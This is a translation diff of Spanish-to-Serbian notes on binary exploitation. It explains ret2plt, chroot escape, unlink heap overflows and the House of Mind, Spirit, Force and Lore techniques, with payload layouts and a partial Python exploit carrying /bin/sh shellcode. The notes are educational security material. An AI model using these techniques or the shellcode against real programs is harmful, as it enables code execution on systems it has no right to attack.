+Interceptuju se pozivi nekim nesigurnim funkcijama sa drugim sigurnim. Nije standardizovano. (samo za x86, ne za kompilacije sa -fomit-frame-pointer, ne statičke kompilacije, ne sve ranjive funkcije postaju sigurne i LD_PRELOAD ne funkcioniše u binarnim datotekama sa suid). **ASCII Armored Address Space** -Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian. +Sastoji se od učitavanja deljenih biblioteka od 0x00000000 do 0x00ffffff kako bi uvek postojao bajt 0x00. Međutim, ovo zapravo ne zaustavlja gotovo nijedan napad, a još manje u little endian. **ret2plt** -Consiste en realiza un ROP de forma que se llame a la función strcpy@plt (de la plt) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar (system()). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system()… Al final se llama la dirección guardada en GOT que será system() +Sastoji se od izvođenja ROP-a tako da se pozove funkcija strcpy@plt (iz plt) i pokaže na ulaz u GOT i kopira prvi bajt funkcije koju želite da pozovete (system()). Zatim se radi isto pokazujući na GOT+1 i kopira se 2. bajt system()… Na kraju se poziva adresa sačuvana u GOT koja će biti system() -**Jaulas con chroot()** +**Kave sa chroot()** -debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico +debootstrap -arch=i386 hardy /home/user —> Instalira osnovni sistem pod specifičnim poddirektorijumom -Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd .. +Admin može izaći iz jedne od ovih kave praveći: mkdir foo; chroot foo; cd .. 
-**Instrumentación de código** +**Instrumentacija koda** -Valgrind —> Busca errores\ +Valgrind —> Traži greške\ Memcheck\ RAD (Return Address Defender)\ Insure++ -## **8 Heap Overflows: Exploits básicos** +## **8 Heap Overflows: Osnovni exploit** -**Trozo asignado** +**Delić dodeljen** prev_size |\ -size | —Cabecera\ -\*mem | Datos +size | —Zaglavlje\ +\*mem | Podaci -**Trozo libre** +**Delić slobodan** prev_size |\ size |\ \*fd | Ptr forward chunk\ -\*bk | Ptr back chunk —Cabecera\ -\*mem | Datos +\*bk | Ptr back chunk —Zaglavlje\ +\*mem | Podaci -Los trozos libres están en una lista doblemente enlazada (bin) y nunca pueden haber dos trozos libres juntos (se juntan) +Slobodni delovi su u dvostruko povezanoj listi (bin) i nikada ne mogu postojati dva slobodna dela zajedno (spajaju se) -En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap() y si el trozo pertenece al arena primario. +U “size” postoje bitovi koji označavaju: Da li je prethodni deo u upotrebi, da li je deo dodeljen putem mmap() i da li deo pripada primarnoj areni. -Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink() y se pasa el nuevo trozo más grande a frontlink() para que le inserte el bin adecuado. +Ako prilikom oslobađanja dela neki od susednih bude slobodan, oni se spajaju putem makroa unlink() i novi veći deo se prosleđuje frontlink() da mu umetne odgovarajući bin. 
unlink(){\ -BK = P->bk; —> El BK del nuevo chunk es el que tuviese el que ya estaba libre antes\ -FD = P->fd; —> El FD del nuevo chunk es el que tuviese el que ya estaba libre antes\ -FD->bk = BK; —> El BK del siguiente chunk apunta al nuevo chunk\ -BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk\ +BK = P->bk; —> BK novog dela je onaj koji je imao prethodno slobodan\ +FD = P->fd; —> FD novog dela je onaj koji je imao prethodno slobodan\ +FD->bk = BK; —> BK sledećeg dela pokazuje na novi deo\ +BK->fd = FD; —> FD prethodnog dela pokazuje na novi deo\ } -Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra: +Dakle, ako uspemo da modifikujemo P->bk sa adresom shellcode i P->fd sa adresom do ulaza u GOT ili DTORS minus 12, postiže se: BK = P->bk = \&shellcode\ FD = P->fd = &\_\_dtor_end\_\_ - 12\ FD->bk = BK -> \*((&\_\_dtor_end\_\_ - 12) + 12) = \&shellcode -Y así se se ejecuta al salir del programa la shellcode. +I tako se shellcode izvršava prilikom izlaska iz programa. -Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto: +Pored toga, 4. izjava unlink() piše nešto i shellcode mora biti prilagođena za ovo: -BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode. +BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor_end\_\_ - 12) —> Ovo izaziva pisanje 4 bajta počevši od 8. bajta shellcode, tako da prva instrukcija shellcode mora biti jmp da preskoči ovo i padne u nekoliko nops koji vode do ostatka shellcode. -Por lo tanto el exploit se crea: +Dakle, exploit se kreira: -En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode. 
+U buffer1 stavljamo shellcode počevši od jmp da padne u nops ili u ostatak shellcode. -Después de la shell code metemos relleno hasta llegar al campo prev_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**. +Nakon shellcode stavljamo popunu do dolaska do polja prev_size i size sledećeg dela. Na ovim mestima stavljamo 0xfffffff0 (tako da se prev_size prepisuje da ima bit koji kaže da je slobodan) i “-4“(0xfffffffc) u size (tako da kada proveri u 3. delu da li je 2. zapravo slobodan, ide na modifikovani prev_size koji će mu reći da je slobodan) -> Tako kada free() istražuje, ići će na size 3. ali zapravo će ići na 2. - 4 i pomisliti da je 2. deo slobodan. I tada će pozvati **unlink()**. -Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso). +Pozivom unlink() koristiće kao P->fd prve podatke 2. dela, tako da će tu biti adresa koju želite da prepišete - 12 (jer će u FD->bk dodati 12 na sačuvanu adresu u FD). I na toj adresi će uneti drugu adresu koju pronađe u 2. delu, koja će nam biti zanimljiva da bude adresa do shellcode (lažni P->bk). 
**from struct import \*** **import os** -**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12bytes de relleno** +**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12 bajtova popune** **shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \\** @@ -265,73 +255,73 @@ Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo q **"\x80\xe8\xdc\xff\xff\xff/bin/sh";** -**prev_size = pack("\ Devuelve un puntero a la dirección donde comienza el trozo (mem-8) +p = mem2chunk(mem); —> Vraća pokazivač na adresu gde počinje deo (mem-8) … 
@@ -351,11 +341,11 @@ ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->a } -En \[1] comprueba el campo size el bit NON_MAIN_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap_for_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar_ptr (como si fuese un struct heap_info) +U \[1] proverava se polje size bit NON_MAIN_ARENA, koji se može izmeniti da provera vrati true i izvrši heap_for_ptr() koji radi and na “mem” ostavljajući 0 na 2.5 manje bitova (u našem slučaju od 0x0804a000 ostavlja 0x08000000) i pristupa 0x08000000->ar_ptr (kao da je struktura heap_info) -De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap_for_ptr(ptr)->ar_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar_ptr) +Na ovaj način, ako možemo kontrolisati deo, na primer u 0x0804a000 i oslobađa se deo u **0x081002a0**, možemo doći do adrese 0x08100000 i napisati šta god želimo, na primer **0x0804a000**. Kada se ovaj drugi deo oslobodi, otkriće da heap_for_ptr(ptr)->ar_ptr vraća ono što smo napisali u 0x08100000 (jer se primenjuje and na 0x081002a0 koji smo videli ranije i odatle se uzima vrednost prvih 4 bajta, ar_ptr) -De esta forma se llama a \_int_free(ar_ptr, mem), es decir, **\_int_free(0x0804a000, 0x081002a0)**\ +Na ovaj način se poziva \_int_free(ar_ptr, mem), tj. **\_int_free(0x0804a000, 0x081002a0)**\ **\_int_free(mstate av, Void_t\* mem){**\ …\ bck = unsorted_chunks(av);\ 
@@ -367,36 +357,36 @@ fwd->bk = p; ..} -Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar. +Kao što smo ranije videli, možemo kontrolisati vrednost av, jer je to ono što smo napisali u delu koji će se osloboditi. -Tal y como se define unsorted_chunks, sabemos que:\ +Kao što je definisano unsorted_chunks, znamo da:\ bck = \&av->bins\[2]-8;\ fwd = bck->fd = \*(av->bins\[2]);\ fwd->bk = \*(av->bins\[2] + 12) = p; -Por lo tanto si en av->bins\[2] escribimos el valor de \_\_DTOR_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR_END\_\_ la dirección del segundo trozo. +Dakle, ako u av->bins\[2] upišemo vrednost \_\_DTOR_END\_\_-12, u poslednjoj instrukciji će se upisati u \_\_DTOR_END\_\_ adresa drugog dela. -Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR_END\_\_-12 porque de ahí la sacará av->bins\[2] +Drugim rečima, u prvom delu moramo na početku više puta staviti adresu \_\_DTOR_END\_\_-12 jer će odatle uzeti av->bins\[2] -En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap_for_ptr() piense que el ar_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2] +Na adresi na kojoj padne adresa drugog dela sa poslednjih 5 nula, treba napisati adresu do ovog prvog dela kako bi heap_for_ptr() pomislio da je ar_ptr na početku prvog dela i izvukao odatle av->bins\[2] -En el segundo trozo y gracias al primero sobreescribimos el prev_size con un jump 0x0c y el size con algo para activar -> NON_MAIN_ARENA +U drugom delu i zahvaljujući prvom prepisujemo prev_size sa jump 0x0c i size sa nečim da aktiviramo -> NON_MAIN_ARENA -A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode +Zatim u delu 2 stavljamo gomilu nops i na kraju shellcode -De esta forma se llamará a \_int_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en 
\_\_DTOR_END\_\_ la dirección del prev_size del TROZO2 el cual saltará a la shellcode. +Na ovaj način će se pozvati \_int_free(TROZO1, TROZO2) i pratiti uputstva da upiše u \_\_DTOR_END\_\_ adresu prev_size TROZO2 koja će preskočiti na shellcode. -Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload. +Da bi se primenila ova tehnika, potrebno je da se ispune neki dodatni zahtevi koji dodatno komplikuju payload. -Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para unlink. Se comparan si el nuevo sitio al que se apunta también le está apuntando a él. +Ova tehnika više nije primenljiva jer je primenjen gotovo isti patch kao za unlink. Proverava se da li nova adresa na koju se pokazuje takođe pokazuje na nju. **Fastbin** -Es una variante de The house of mind +To je varijanta The house of mind -nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int_free() +Zanima nas da izvršimo sledeći kod do kojeg se dolazi nakon prve provere funkcije \_int_free() -fb = &(av->fastbins\[fastbin_index(size)] —> Siendo fastbin_index(sz) —> (sz >> 3) - 2 +fb = &(av->fastbins\[fastbin_index(size)] —> Gde je fastbin_index(sz) —> (sz >> 3) - 2 … 
@@ -404,61 +394,61 @@ p->fd = \*fb \*fb = p -De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max_fast esté en la dirección que vamos a sobreescribir. +Na ovaj način, ako stavimo u “fb” adresu funkcije u GOT, na ovoj adresi će se staviti adresa do prepisanog dela. Za ovo će biti potrebno da arena bude blizu adresa dtors. Tačnije, da av->max_fast bude na adresi koju ćemo prepisati. -Dado que con The House of Mind se vio que nosotros controlábamos la posición del av. +S obzirom na to da smo sa The House of Mind videli da kontrolišemo poziciju av. -Entones si en el campo size ponemos un tamaño de 8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index() nos devolverá fastbins\[-1], que apuntará a av->max_fast +Dakle, ako u polje size stavimo veličinu od 8 + NON_MAIN_ARENA + PREV_INUSE —> fastbin_index() će nam vratiti fastbins\[-1], koji će pokazivati na av->max_fast -En este caso av->max_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita). +U ovom slučaju av->max_fast će biti adresa koja će se prepisati (ne na koju pokazuje, već ta pozicija će biti prepisana). -Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops). +Pored toga, mora se ispuniti da je deo susedni oslobođen mora biti veći od 8 -> S obzirom na to da smo rekli da je size oslobođenog dela 8, u ovom lažnom delu samo treba staviti size veći od 8 (pošto će shellcode ići u oslobođeni deo, na početku će biti potrebno staviti jmp koji pada u nops). -Además, ese mismo trozo falso debe ser menor que av->system_mem. 
av->system_mem se encuentra 1848 bytes más allá. +Pored toga, taj isti lažni deo mora biti manji od av->system_mem. av->system_mem se nalazi 1848 bajtova dalje. -Por culpa de los nulos de \_DTOR_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila. +Zbog nula u \_DTOR_END\_ i malo adresa u GOT, nijedna adresa ovih sekcija ne može biti prepisana, tako da vidimo kako primeniti fastbin da napadnemo stek. -Otra forma de ataque es redirigir el **av** hacia la pila. +Drugi način napada je preusmeriti **av** ka steku. -Si modificamos el size para que de 16 en vez de 8 entonces: fastbin_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila. +Ako modifikujemo size da bude 16 umesto 8, tada: fastbin_index() će nam vratiti fastbins\[0] i možemo iskoristiti ovo da prepišemo stek. -Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET +Za ovo ne sme biti nikakvog canary-a niti čudnih vrednosti na steku, zapravo se moramo nalaziti u ovoj: 4 bajta nula + EBP + RET -Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. +4 bajta nula su potrebni da **av** bude na ovoj adresi i prvi element **av** je mutex koji mora biti 0. -El **av->max_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. +**av->max_fast** će biti EBP i biće vrednost koja će nam pomoći da preskočimo ograničenja. -En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode. +U **av->fastbins\[0]** će se prepisati sa adresom **p** i biće RET, tako da će preskočiti na shellcode. 
-Además, en **av->system_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza. +Pored toga, u **av->system_mem** (1484 bajta iznad pozicije na steku) biće dovoljno smeća koje će nam omogućiti da preskočimo proveru koja se vrši. -Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso). +Pored toga, mora se ispuniti da je deo susedni oslobođen mora biti veći od 8 -> S obzirom na to da smo rekli da je size oslobođenog dela 16, u ovom lažnom delu samo treba staviti size veći od 8 (pošto će shellcode ići u oslobođeni deo, na početku će biti potrebno staviti jmp koji pada u nops koji dolaze nakon polja size novog lažnog dela). **The House of Spirit** -En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable). +U ovom slučaju tražimo da imamo pokazivač na malloc koji može biti izmenjen od strane napadača (na primer, da je pokazivač na steku ispod mogućeg preplavljivanja promenljive). -Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48. +Tako bismo mogli učiniti da ovaj pokazivač pokazuje gde god želimo. 
Međutim, ne može svako mesto biti važno, veličina lažnog dela mora biti manja od av->max_fast i specifično jednaka veličini zatraženoj u budućem pozivu malloc()+8. Stoga, ako znamo da nakon ovog ranjivog pokazivača pozivamo malloc(40), veličina lažnog dela mora biti jednaka 48. -Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system_mem. +Ako, na primer, program traži od korisnika broj, mogli bismo uneti 48 i usmeriti modifikovani malloc pokazivač na sledećih 4 bajta (koji bi mogli pripadati EBP-u sa srećom, tako da 48 ostane iza, kao da je zaglavlje size). Pored toga, adresa ptr-4+48 mora ispunjavati nekoliko uslova (u ovom slučaju ptr=EBP), tj. 8 < ptr-4+48 < av->system_mem. -En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera. +U slučaju da se ovo ispuni, kada se pozove sledeći malloc koji smo rekli da je malloc(40), dodeliće se kao adresa adresa EBP-a. U slučaju da napadač takođe može kontrolisati šta se piše u ovom malloc-u, može prepisati i EBP i EIP sa adresom koju želi. -Esto creo que es porque así cuando lo libere free() guardará que en la dirección que apunta al EBP del stack hay un trozo de tamaño perfecto para el nuevo malloc() que se quiere reservar, así que le asigna esa dirección. 
+Mislim da je to zato što će tako kada ga oslobodi free() zadržati da u adresi koja pokazuje na EBP steka postoji deo savršene veličine za novi malloc() koji se želi rezervisati, tako da mu dodeljuje tu adresu. **The House of Force** -Es necesario: +Potrebno je: -- Un overflow a un trozo que permita sobreescribir el wilderness -- Una llamada a malloc() con el tamaño definido por el usuario -- Una llamada a malloc() cuyos datos puedan ser definidos por el usuario +- Preplavljivanje dela koje omogućava prepisivanje wilderness +- Poziv malloc() sa veličinom definisanom od strane korisnika +- Poziv malloc() čiji podaci mogu biti definisani od strane korisnika -Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int_malloc() sin necesidad de expandir el heap +Prvo što se radi je prepisivanje size dela wilderness sa veoma velikom vrednošću (0xffffffff), tako da će svaka zahtevana memorija dovoljno velika biti obrađena u \_int_malloc() bez potrebe za proširenjem heap-a -Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8. +Drugo je izmena av->top da pokazuje na područje memorije pod kontrolom napadača, kao što je stek. U av->top će se staviti \&EIP - 8. -Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el control del atacante: +Moramo prepisati av->top da pokazuje na područje memorije pod kontrolom napadača: victim = av->top; 
@@ -466,86 +456,86 @@ remainder = chunck_at_offset(victim, nb); av->top = remainder; -Victim recoge el valor de la dirección del trozo wilderness actual (el actual av->top) y remainder es exactamente la suma de esa dirección más la cantidad de bytes solicitados por malloc(). Por lo que si \&EIP-8 está en 0xbffff224 y av->top contiene 0x080c2788, entonces la cantidad que tenemos que reservar en el malloc controlado para que av->top quede apuntando a $EIP-8 para el próximo malloc() será: +Victim uzima vrednost adrese trenutnog dela wilderness (trenutni av->top) i remainder je tačno zbir te adrese plus količina bajtova zatraženih od malloc(). Tako da ako \&EIP-8 bude na 0xbffff224 i av->top sadrži 0x080c2788, tada će količina koju moramo rezervisati u kontrolisanom malloc-u da bi av->top pokazivao na $EIP-8 za sledeći malloc() biti: 0xbffff224 - 0x080c2788 = 3086207644. -Así se guardará en av->top el valor alterado y el próximo malloc apuntará al EIP y lo podrá sobreescribir. +Tako će se sačuvati u av->top izmenjena vrednost i sledeći malloc će pokazivati na EIP i moći će ga prepisati. -Es importante saber que el size del nuevo trozo wilderness sea más grande que la solicitud realizada por el último malloc(). Es decir, si el wilderness está apuntando a \&EIP-8, el size quedará justo en el campo EBP del stack. +Važno je znati da je size novog dela wilderness veći od zahteva postavljenog od poslednjeg malloc(). Drugim rečima, ako wilderness pokazuje na \&EIP-8, size će biti tačno u polju EBP steka. **The House of Lore** -**Corrupción SmallBin** +**Korupcija SmallBin** -Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. 
A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. +Oslobođeni delovi se unose u bin u zavisnosti od njihove veličine. Ali pre nego što se unesu, čuvaju se u unsorted bins. Kada se deo oslobodi, ne unosi se odmah u svoj bin, već ostaje u unsorted bins. Zatim, ako se rezerviše novi deo i prethodni oslobođeni može poslužiti, vraća se, ali ako se rezerviše veći, oslobođeni deo u unsorted bins se stavlja u svoj odgovarajući bin. -Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max_fast (72normalmente) y menos a MIN_LARGE_SIZE (512). +Da bi se došlo do ranjivog koda, zahtev za memorijom mora biti veći od av->max_fast (72 obično) i manji od MIN_LARGE_SIZE (512). -Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: +Ako u binu postoji deo odgovarajuće veličine za ono što se traži, vraća se taj nakon što se odveže: -bck = victim->bk; Apunta al trozo anterior, es la única info que podemos alterar. +bck = victim->bk; Pokazuje na prethodni deo, to je jedina informacija koju možemo izmeniti. 
-bin->bk = bck; El penúltimo trozo pasa a ser el último, en caso de que bck apunte al stack al siguiente trozo reservado se le dará esta dirección +bin->bk = bck; Pretposlednji deo postaje poslednji, u slučaju da bck pokazuje na stek, sledećem rezervisanom delu će se dati ova adresa -bck->fd = bin; Se cierra la lista haciendo que este apunte a bin +bck->fd = bin; Lista se zatvara tako da ovaj pokazuje na bin -Se necesita: +Potrebno je: -Que se reserven dos malloc, de forma que al primero se le pueda hacer overflow después de que el segundo haya sido liberado e introducido en su bin (es decir, se haya reservado un malloc superior al segundo trozo antes de hacer el overflow) +Da se rezervišu dva malloc, tako da se prvom može napraviti overflow nakon što je drugi oslobođen i unet u svoj bin (tj. da se rezerviše malloc veći od drugog dela pre nego što se napravi overflow) -Que el malloc reservado al que se le da la dirección elegida por el atacante sea controlada por el atacante. +Da rezervisani malloc kojem se daje adresa izabrana od strane napadača bude pod kontrolom napadača. -El objetivo es el siguiente, si podemos hacer un overflow a un heap que tiene por debajo un trozo ya liberado y en su bin, podemos alterar su puntero bk. Si alteramos su puntero bk y este trozo llega a ser el primero de la lista de bin y se reserva, a bin se le engañará y se le dirá que el último trozo de la lista (el siguiente en ofrecer) está en la dirección falsa que hayamos puesto (al stack o GOT por ejemplo). Por lo que si se vuelve a reservar otro trozo y el atacante tiene permisos en él, se le dará un trozo en la posición deseada y podrá escribir en ella. +Cilj je sledeći, ako možemo napraviti overflow na heap koji ispod ima već oslobođeni deo i u svom binu, možemo izmeniti njegov pokazivač bk. 
Ako izmenimo njegov pokazivač bk i ovaj deo postane prvi u listi bina i rezervi se, bin će biti prevaren i reći će mu da je poslednji deo liste (sledeći koji se nudi) na lažnoj adresi koju smo stavili (na stek ili GOT, na primer). Tako da ako se ponovo rezerviše drugi deo i napadač ima dozvole za njega, dobiće deo na željenoj poziciji i moći će da piše u nju. -Tras liberar el trozo modificado es necesario que se reserve un trozo mayor al liberado, así el trozo modificado saldrá de unsorted bins y se introduciría en su bin. +Nakon oslobađanja izmenjenog dela, potrebno je rezervisati deo veći od oslobođenog, tako da će izmenjeni deo izaći iz unsorted bins i uneti se u svoj bin. -Una vez en su bin es el momento de modificarle el puntero bk mediante el overflow para que apunte a la dirección que queramos sobreescribir. +Jednom kada je u svom binu, vreme je da mu izmenimo pokazivač bk putem overflow-a da bi pokazivao na adresu koju želimo da prepišemo. -Así el bin deberá esperar turno a que se llame a malloc() suficientes veces como para que se vuelva a utilizar el bin modificado y engañe a bin haciéndole creer que el siguiente trozo está en la dirección falsa. Y a continuación se dará el trozo que nos interesa. +Tako će bin čekati red da se pozove malloc() dovoljno puta da bi se ponovo koristio izmenjeni bin i prevario bin da pomisli da je sledeći deo na lažnoj adresi. A zatim će se dati deo koji nas zanima. -Para que se ejecute la vulnerabilidad lo antes posible lo ideal sería: Reserva del trozo vulnerable, reserva del trozo que se modificará, se libera este trozo, se reserva un trozo más grande al que se modificará, se modifica el trozo (vulnerabilidad), se reserva un trozo de igual tamaño al vulnerado y se reserva un segundo trozo de igual tamaño y este será el que apunte a la dirección elegida. 
+Da bi se ranjivost izvršila što je pre moguće, idealno bi bilo: Rezervacija ranjivog dela, rezervacija dela koji će se izmeniti, oslobađanje ovog dela, rezervacija dela veće veličine koji će se izmeniti, izmena dela (ranjivost), rezervacija dela iste veličine kao ranjivog i rezervacija drugog dela iste veličine i ovaj će biti onaj koji pokazuje na izabranu adresu. -Para proteger este ataque se uso la típica comprobación de que el trozo “no” es falso: se comprueba si bck->fd está apuntando a victim. Es decir, en nuestro caso si el puntero fd\* del trozo falso apuntado en el stack está apuntando a victim. Para sobrepasar esta protección el atacante debería ser capaz de escribir de alguna forma (por el stack probablemente) en la dirección adecuada la dirección de victim. Para que así parezca un trozo verdadero. +Da bi se zaštitio od ovog napada, korišćena je tipična provera da deo “nije” lažan: proverava se da li bck->fd pokazuje na victim. Drugim rečima, u našem slučaju, ako pokazivač fd\* lažnog dela koji se pokazuje na steku pokazuje na victim. Da bi se prešla ova zaštita, napadač bi trebao biti u mogućnosti da na neki način (verovatno putem steka) napiše na odgovarajuću adresu adresu victim. Tako da izgleda kao pravi deo. -**Corrupción LargeBin** +**Korupcija LargeBin** -Se necesitan los mismos requisitos que antes y alguno más, además los trozos reservados deben ser mayores a 512. +Potrebni su isti zahtevi kao ranije i još neki, pored toga, rezervisani delovi moraju biti veći od 512. -El ataque es como el anterior, es decir, ha que modificar el puntero bk y se necesitan todas esas llamadas a malloc(), pero además hay que modificar el size del trozo modificado de forma que ese size - nb sea < MINSIZE. +Napad je kao i prethodni, tj. mora se izmeniti pokazivač bk i potrebni su svi ti pozivi na malloc(), ali pored toga, treba izmeniti size izmenjenog dela tako da taj size - nb bude < MINSIZE. 
-Por ejemplo hará que poner en size 1552 para que 1552 - 1544 = 8 < MINSIZE (la resta no puede quedar negativa porque se compara un unsigned) +Na primer, to će učiniti da se stavi u size 1552 kako bi 1552 - 1544 = 8 < MINSIZE (oduzimanje ne može biti negativno jer se upoređuje unsigned) -Además se ha introducido un parche para hacerlo aún más complicado. +Pored toga, uveden je patch da bi se to učinilo još komplikovanijim. **Heap Spraying** -Básicamente consiste en reservar tooda la memoria posible para heaps y rellenar estos con un colchón de nops acabados por una shellcode. Además, como colchón se utiliza 0x0c. Pues se intentará saltar a la dirección 0x0c0c0c0c, y así si se sobreescribe alguna dirección a la que se vaya a llamar con este colchón se saltará allí. Básicamente la táctica es reservar lo máximos posible para ver si se sobreescribe algún puntero y saltar a 0x0c0c0c0c esperando que allí haya nops. +Osnovno se sastoji od rezervisanja što više moguće memorije za heaps i punjenja ovih sa jastučićem nops završenim shellcode-om. Pored toga, kao jastučić se koristi 0x0c. Tako da će se pokušati preskočiti na adresu 0x0c0c0c0c, i tako ako se prepiše neka adresa na koju će se pozvati sa ovim jastučićem, preskočiće se tamo. Osnovna taktika je rezervisati što je više moguće da vidimo da li se prepisuje neki pokazivač i preskočiti na 0x0c0c0c0c očekujući da tamo budu nops. **Heap Feng Shui** -Consiste en mediante reservas y liberaciones sementar la memoria de forma que queden trozos reservados entre medias de trozos libres. El buffer a desbordar se situará en uno de los huevos. +Sastoji se od rezervacija i oslobađanja kako bi se semenirala memorija tako da ostanu rezervisani delovi između slobodnih delova. Buffer koji se preplavljuje će se nalaziti u jednom od jaja. 
